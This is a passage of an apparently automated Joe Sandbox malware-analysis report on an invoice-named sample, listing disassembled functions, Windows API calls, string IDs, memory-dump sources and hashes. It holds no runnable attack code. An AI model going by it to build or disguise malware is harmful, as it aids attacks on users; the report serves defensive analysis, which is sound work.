                                                                            • Instruction Fuzzy Hash: B4419A3250464A8BCF20EF10D962AFE33A4EF11311F194455FE512B293DB709D1AEBA0
                                                                            Function 00F2F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F0E2A0,00000010,?,Bad directive syntax error,00F5F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F2F7C2
                                                                            • LoadStringW.USER32(00000000,?,00F0E2A0,00000010), ref: 00F2F7C9
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • _wprintf.LIBCMT ref: 00F2F7FC
                                                                            • __swprintf.LIBCMT ref: 00F2F81E
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F2F88D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1506413516-4153970271
                                                                            • Opcode ID: 1c5a2d301af214c65165b940fcf2ffe9724648d151efd1e64d5f0d67534e2ad5
                                                                            • Instruction ID: 5e77f530dcd6f3cc5bbc144f890099583d173828b38f8e2f31a431dd7bd22039
                                                                            • Opcode Fuzzy Hash: 1c5a2d301af214c65165b940fcf2ffe9724648d151efd1e64d5f0d67534e2ad5
                                                                            • Instruction Fuzzy Hash: 57216D3291021EAFCF11EF90CC1AEEEB779FF18301F040466B655761A2EA319619EB51
                                                                            Function 00F352C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                              • Part of subcall function 00ED7924: _memmove.LIBCMT ref: 00ED79AD
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F35330
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F35346
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F35357
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F35369
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F3537A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: cd8b29a80058303682684c57a8b2a5c739bb2dbda9f6dc83994c0359c744bd93
                                                                            • Instruction ID: 6a41459310bb9fd71772aa47e9e7934bbcb5dedc5084ef40a1029814fee43a3d
                                                                            • Opcode Fuzzy Hash: cd8b29a80058303682684c57a8b2a5c739bb2dbda9f6dc83994c0359c744bd93
                                                                            • Instruction Fuzzy Hash: B4118221A9022979D720B765CC5ADFFBBBCEBD5F90F80042AB451A21D1EEA04D06D6A1
                                                                            Function 00F346B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 208665112-3771769585
                                                                            • Opcode ID: 3d1a11e818d3309f96adeed9d5f2531ebcdaa6072419d41c4180be8bb1985add
                                                                            • Instruction ID: c96af789b3336a500df0bc3e124a27f2420e2dd0c6a69fd65ed031b4fe5f2d85
                                                                            • Opcode Fuzzy Hash: 3d1a11e818d3309f96adeed9d5f2531ebcdaa6072419d41c4180be8bb1985add
                                                                            • Instruction Fuzzy Hash: 8C11D531900218ABCB14AB309C46EEA77BCEF02732F0441BAF645A6091EF71A985AA51
                                                                            Function 00F34F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00F34F7A
                                                                              • Part of subcall function 00EF049F: timeGetTime.WINMM(?,7707B400,00EE0E7B), ref: 00EF04A3
                                                                            • Sleep.KERNEL32(0000000A), ref: 00F34FA6
                                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F34FCA
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F34FEC
                                                                            • SetActiveWindow.USER32 ref: 00F3500B
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F35019
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F35038
                                                                            • Sleep.KERNEL32(000000FA), ref: 00F35043
                                                                            • IsWindow.USER32 ref: 00F3504F
                                                                            • EndDialog.USER32(00000000), ref: 00F35060
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 3519a3b012e5b2690632ebd70df3038c18e62d9bbb6dca72bf6c959f83a73ee0
                                                                            • Instruction ID: 9ea7943e55d69e9b2d7612a715775cc1fd8ad89c3a02c37fd6c94ac4242a2bdb
                                                                            • Opcode Fuzzy Hash: 3519a3b012e5b2690632ebd70df3038c18e62d9bbb6dca72bf6c959f83a73ee0
                                                                            • Instruction Fuzzy Hash: 8221A17060070DAFE7215F30EC89B2A3B69EB46B66F0E1025F601C21B5DB729D04BB62
                                                                            Function 00F3D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • CoInitialize.OLE32(00000000), ref: 00F3D5EA
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F3D67D
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00F3D691
                                                                            • CoCreateInstance.COMBASE(00F62D7C,00000000,00000001,00F88C1C,?), ref: 00F3D6DD
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F3D74C
                                                                            • CoTaskMemFree.COMBASE(?), ref: 00F3D7A4
                                                                            • _memset.LIBCMT ref: 00F3D7E1
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00F3D81D
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F3D840
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F3D847
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F3D87E
                                                                            • CoUninitialize.COMBASE ref: 00F3D880
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: 9461851a5315cf83dcea2400ea0aa119950681c50207009217e17e30f11ec92b
                                                                            • Instruction ID: c893839b5ff86a94e291d93c35dc02fe64dcab3d252f33fd4d8e0a5a37416315
                                                                            • Opcode Fuzzy Hash: 9461851a5315cf83dcea2400ea0aa119950681c50207009217e17e30f11ec92b
                                                                            • Instruction Fuzzy Hash: 3DB1FA75A00209AFDB04DFA4D885DAEBBF9FF48314F1484A9E909EB261DB30ED45DB50
                                                                            Function 00F2C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00F2C283
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F2C295
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F2C2F3
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00F2C2FE
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F2C310
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F2C364
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F2C372
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F2C383
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F2C3C6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00F2C3D4
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F2C3F1
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F2C3FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: d1d74614409854818ca6ac9b4a8f30a306eb1338490fb37d8ace9e9788101579
                                                                            • Instruction ID: ae96f78791427a1ef58bbfaf8f76607bb4687f922ea4fffeb9b62d18cf9a75e9
                                                                            • Opcode Fuzzy Hash: d1d74614409854818ca6ac9b4a8f30a306eb1338490fb37d8ace9e9788101579
                                                                            • Instruction Fuzzy Hash: A9519071F00309AFDB08CFA8DD89AAEBBBAEB88311F14856DF605D7290D7709D049B50
                                                                            Function 00ED21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • GetSysColor.USER32(0000000F), ref: 00ED21D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 57aadfa08a6c058d0b4484db89316ef36e64af0634d3a39912d88d01df47907e
                                                                            • Instruction ID: d9e745da3c7f3635ecca0e9f74d8e1ea779da000d69f8d2bb5f71af780a186a8
                                                                            • Opcode Fuzzy Hash: 57aadfa08a6c058d0b4484db89316ef36e64af0634d3a39912d88d01df47907e
                                                                            • Instruction Fuzzy Hash: 0441A631404644DFDB255F68EC48BB93B65EB16331F1452AAFF659A2F1C7318C42EB21
                                                                            Function 00F3A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00F5F910), ref: 00F3A90B
                                                                            • GetDriveTypeW.KERNEL32(00000061,00F889A0,00000061), ref: 00F3A9D5
                                                                            • _wcscpy.LIBCMT ref: 00F3A9FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1000479233
                                                                            • Opcode ID: eed725c268af16c3dcb4bb412e348f5a7ef7795fad9dc21babf08e6ec46d17d3
                                                                            • Instruction ID: 120827703bbb9f89d19d93b82145586d5eb6a5b8e8b815d166989edf50e5af9f
                                                                            • Opcode Fuzzy Hash: eed725c268af16c3dcb4bb412e348f5a7ef7795fad9dc21babf08e6ec46d17d3
                                                                            • Instruction Fuzzy Hash: 3D51AA325083019BC700EF15C992AAFB7E5EF84760F40586EF9D5A72A2DB31990ADB53
                                                                            Function 00ED9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: 5b9886e43883da92f03a6437b1411af787e34622ecc1342368bf3a098ccdaf84
                                                                            • Instruction ID: 29dd812d217ed42f66eacc83c1fe4de3ec1b0bc86d500a78fb6e12718fc5aec7
                                                                            • Opcode Fuzzy Hash: 5b9886e43883da92f03a6437b1411af787e34622ecc1342368bf3a098ccdaf84
                                                                            • Instruction Fuzzy Hash: 2841E475900209AFDB28DF34DC42ABA73E9EF05710F24446EE549E7382EA32D906AB11
                                                                            Function 00F57152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F5716A
                                                                            • CreateMenu.USER32 ref: 00F57185
                                                                            • SetMenu.USER32(?,00000000), ref: 00F57194
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57221
                                                                            • IsMenu.USER32(?), ref: 00F57237
                                                                            • CreatePopupMenu.USER32 ref: 00F57241
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F5726E
                                                                            • DrawMenuBar.USER32 ref: 00F57276
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$F
                                                                            • API String ID: 176399719-3044882817
                                                                            • Opcode ID: 19e0701e874011640e895502e2d1544c1ae9e1f08fc14b0d9cf04f545d2a36fa
                                                                            • Instruction ID: 7581dae208dc2257dca1cf3c1ece0b1a9c5b6ca9b25d5a9a6afef3cabc0754a1
                                                                            • Opcode Fuzzy Hash: 19e0701e874011640e895502e2d1544c1ae9e1f08fc14b0d9cf04f545d2a36fa
                                                                            • Instruction Fuzzy Hash: 50414675A01309AFDB20EF64E844E9ABBB5FB08351F144069FE05A7361D731A918EF90
                                                                            Function 00F574BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F5755E
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00F57565
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F57578
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F57580
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F5758B
                                                                            • DeleteDC.GDI32(00000000), ref: 00F57594
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00F5759E
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F575B2
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F575BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: efb2041ef705c06a5d9ac21a768bc0096a27ffb80ec653ba271453e20f507571
                                                                            • Instruction ID: 19e09516d7edf67073eb16908451c97ebe77ec012ff4dfc64588bee2db06d735
                                                                            • Opcode Fuzzy Hash: efb2041ef705c06a5d9ac21a768bc0096a27ffb80ec653ba271453e20f507571
                                                                            • Instruction Fuzzy Hash: A7316E72504218BBDF12AF64EC08FDB3F69EF09322F150265FB15961A0D735D819EBA4
                                                                            Function 00EF6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00EF6E3E
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            • __gmtime64_s.LIBCMT ref: 00EF6ED7
                                                                            • __gmtime64_s.LIBCMT ref: 00EF6F0D
                                                                            • __gmtime64_s.LIBCMT ref: 00EF6F2A
                                                                            • __allrem.LIBCMT ref: 00EF6F80
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF6F9C
                                                                            • __allrem.LIBCMT ref: 00EF6FB3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF6FD1
                                                                            • __allrem.LIBCMT ref: 00EF6FE8
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF7006
                                                                            • __invoke_watson.LIBCMT ref: 00EF7077
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                            • Instruction ID: c7bb0298edab578c7532a35a3cfd60aa979dbc00df7d370cb826b88d35998e91
